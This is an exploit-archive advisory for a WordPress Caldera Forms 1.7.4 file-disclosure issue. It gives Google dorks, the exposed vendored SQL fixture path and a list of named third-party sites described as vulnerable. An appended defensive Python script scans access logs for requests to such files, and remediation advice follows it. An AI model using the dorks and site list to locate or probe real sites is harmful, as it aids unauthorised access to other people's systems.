#################################################################################################
# Exploit Title : WordPress Caldera Forms Plugin 1.7.4 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 06/12/2018
# Vendor Homepage : wordpress.org/plugins/caldera-forms/ ~ calderaforms.com/updates/caldera-forms-1-7-4/
# Software Download Link : downloads.wordpress.org/plugin/caldera-forms.1.7.4.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.7.4
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/caldera-forms/''
intext:''A-Data | Software til sundheden''
intext:''Harvest Time Christian School and KidLife Preschool''
intext:''© The Cradle Company 2018''
intext:''Theme by Tyler Moore''
intext:''Jens Wiecker DIGITAL IMAGE ARTIST AND PHOTOGRAPH ''
intext:''Avada Theme by Theme Fusion | All Rights Reserved | Powered by WordPress''
intext:''Copyright © 2018 Hands2gether. All Rights Reserved.''
intext:''intext:''Designed by 2it'' site:gr
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] a-data.dk/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] kirabpemuda2018.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] holisticanimal.clinic/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] htcsfl.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] thecradlecompany.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] excelsioryogasf.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] junkescontabilidade.com.br/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] wiecker-photography.de/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] fbclansing.org/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] hands2gether.net/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] dietsensor.com/2016/dev/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
[+] ekdoseiseksi.gr/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
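The path in the advisory shows what is actually exposed: a test fixture (tests/Resources/expectedQueries.sql) belonging to a Composer library vendored inside the plugin, shipped to the web root along with its dev-only files. For a site owner the useful questions are whether anyone has fetched such files and whether the server actually served them. The script below is an added example, not part of the advisory and not Caldera Forms code: it parses combined-format access-log lines (the log lines are constructed for the demo), flags requests for vendored test directories or raw .sql files under wp-content/plugins, and records whether the response was a 200 (file disclosed) or something else (request blocked). The regexes and the 200-means-served rule are assumptions of the example, not anything the advisory states.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample lines in Apache/nginx "combined" log format. The first
# vendor-test hit returns 200 (disclosed); the second is blocked with 403.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Dec/2018:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [06/Dec/2018:10:01:09 +0000] "GET /wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql HTTP/1.1" 200 8831 "-" "curl/7.58.0"
198.51.100.7 - - [06/Dec/2018:10:02:30 +0000] "GET /wp-content/plugins/caldera-forms/assets/js/caldera-forms-front.min.js HTTP/1.1" 200 33012 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Dec/2018:10:03:11 +0000] "GET /wp-content/plugins/some-plugin/vendor/acme/lib/tests/fixtures/dump.sql HTTP/1.1" 403 199 "-" "python-requests/2.20"
"""

# Minimal combined-log parser: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

# A test suite living under a plugin's Composer vendor tree. The optional
# prefix group allows WordPress installs in a subdirectory (e.g. /2016/dev/).
VENDOR_TEST_RE = re.compile(
    r'^/(?:.*/)?wp-content/plugins/[^/]+/vendor/.+/tests?/', re.IGNORECASE
)
# Raw SQL files anywhere under the plugins directory should never be web-served.
PLUGIN_SQL_RE = re.compile(r'^/(?:.*/)?wp-content/plugins/.+\.sql$', re.IGNORECASE)


def is_exposed_dev_artifact(path: str) -> bool:
    """True if the request path points at a vendored test fixture or .sql file."""
    path = path.split('?', 1)[0]  # ignore any query string
    return bool(VENDOR_TEST_RE.search(path) or PLUGIN_SQL_RE.search(path))


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one record per request for a dev artifact, noting whether it was served."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if not is_exposed_dev_artifact(m['path']):
            continue
        status = int(m['status'])
        hits.append({
            'ip': m['ip'],
            'time': m['ts'],
            'path': m['path'],
            'status': status,
            'served': status == 200,  # 200 means the file really was disclosed
        })
    return hits


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        verdict = 'DISCLOSED' if hit['served'] else 'blocked'
        print(f"{hit['time']} {hit['ip']} {hit['status']} {verdict} {hit['path']}")
```

A 200 on one of these paths means the fixture left the server, so the finding is confirmed rather than merely possible. The corresponding fix is on the server side: deny web access to vendor/ and tests/ directories under wp-content/plugins in the web server configuration, and build plugin releases without dev dependencies (for Composer projects, installing with --no-dev) so test fixtures are never deployed in the first place.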